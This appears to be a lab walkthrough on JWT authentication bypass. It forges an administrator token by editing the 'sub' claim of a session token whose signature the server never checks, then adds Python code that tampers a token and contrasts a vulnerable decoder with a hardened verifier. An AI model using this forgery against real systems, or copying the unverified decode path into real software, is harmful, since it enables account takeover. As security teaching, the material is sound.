We have a website that issues a JWT as its session token.

Now let's go and try to log in.

Okay, hit login.

As we can see, we are logged in as the user wiener. Now let's open Burp Suite and intercept the request.

As we can see, the JWT Editor extension has identified a JWT in this request.
Now let's send it to Repeater and open the JWT Editor tab.

As we can see, the payload section of the JWT contains a sub claim holding the username of the currently logged-in user.
Now, what happens if we change its value to administrator and resend the request? We do not have the server's signing key, so the signature stays exactly as the server issued it for wiener and no longer matches the edited payload.

As we can see, the response now offers the admin panel: the server accepted the modified token, so it is evidently not verifying the signature against the payload.
Now let's open the response in the browser.

As we can see, we are on the /admin endpoint, and deleting the user carlos solves the lab.
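To make the failure concrete, here is an added example (my own code, not part of the original write-up or the lab) that reproduces the sub edit from above and shows why it only works against a server that skips signature verification. It assumes an HS256 token and a constructed demo key; the lab's real algorithm and key are not known from this page, and the tokens built here are constructed demo values.

```python
import base64
import hashlib
import hmac
import json


def b64url_encode(data: bytes) -> str:
    """Base64url without padding, as JWT segments are encoded."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    """Inverse of b64url_encode; restores the padding that JWTs strip."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def make_jwt(payload: dict, key: bytes) -> str:
    """Build an HS256 token (assumed algorithm) the way a server would at login."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = (
        b64url_encode(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    )
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def tamper_sub(token: str, new_sub: str) -> str:
    """Replace the sub claim but keep the original signature: the JWT Editor edit from the write-up."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    payload = json.loads(b64url_decode(payload_b64))
    payload["sub"] = new_sub
    new_payload_b64 = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    return f"{header_b64}.{new_payload_b64}.{sig_b64}"


def decode_unverified(token: str) -> dict:
    """Vulnerable server-side check: trusts the payload without ever looking at the signature."""
    _, payload_b64, _ = token.split(".")
    return json.loads(b64url_decode(payload_b64))


def decode_verified(token: str, key: bytes) -> dict:
    """Hardened check: pin the algorithm, recompute the MAC over header.payload, compare in constant time."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        raise ValueError("unexpected alg")
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(payload_b64))


# Constructed demo values (not from the lab): a hypothetical server key and wiener's session token.
SERVER_KEY = b"demo-secret-not-the-lab-key"
WIENER_TOKEN = make_jwt({"sub": "wiener"}, SERVER_KEY)
FORGED_TOKEN = tamper_sub(WIENER_TOKEN, "administrator")

if __name__ == "__main__":
    print("unverified server sees sub =", decode_unverified(FORGED_TOKEN)["sub"])
    try:
        decode_verified(FORGED_TOKEN, SERVER_KEY)
    except ValueError as err:
        print("verifying server rejects the token:", err)
```

The forged token carries wiener's original signature over a payload that now says administrator. A server that decodes the payload without verifying (decode_unverified) grants the admin role, which is the behaviour seen in the lab; a server that recomputes and compares the MAC (decode_verified) rejects it. Pinning alg before verifying also closes the door on alg=none and algorithm-confusion tricks, which this page does not cover but which target the same decode path.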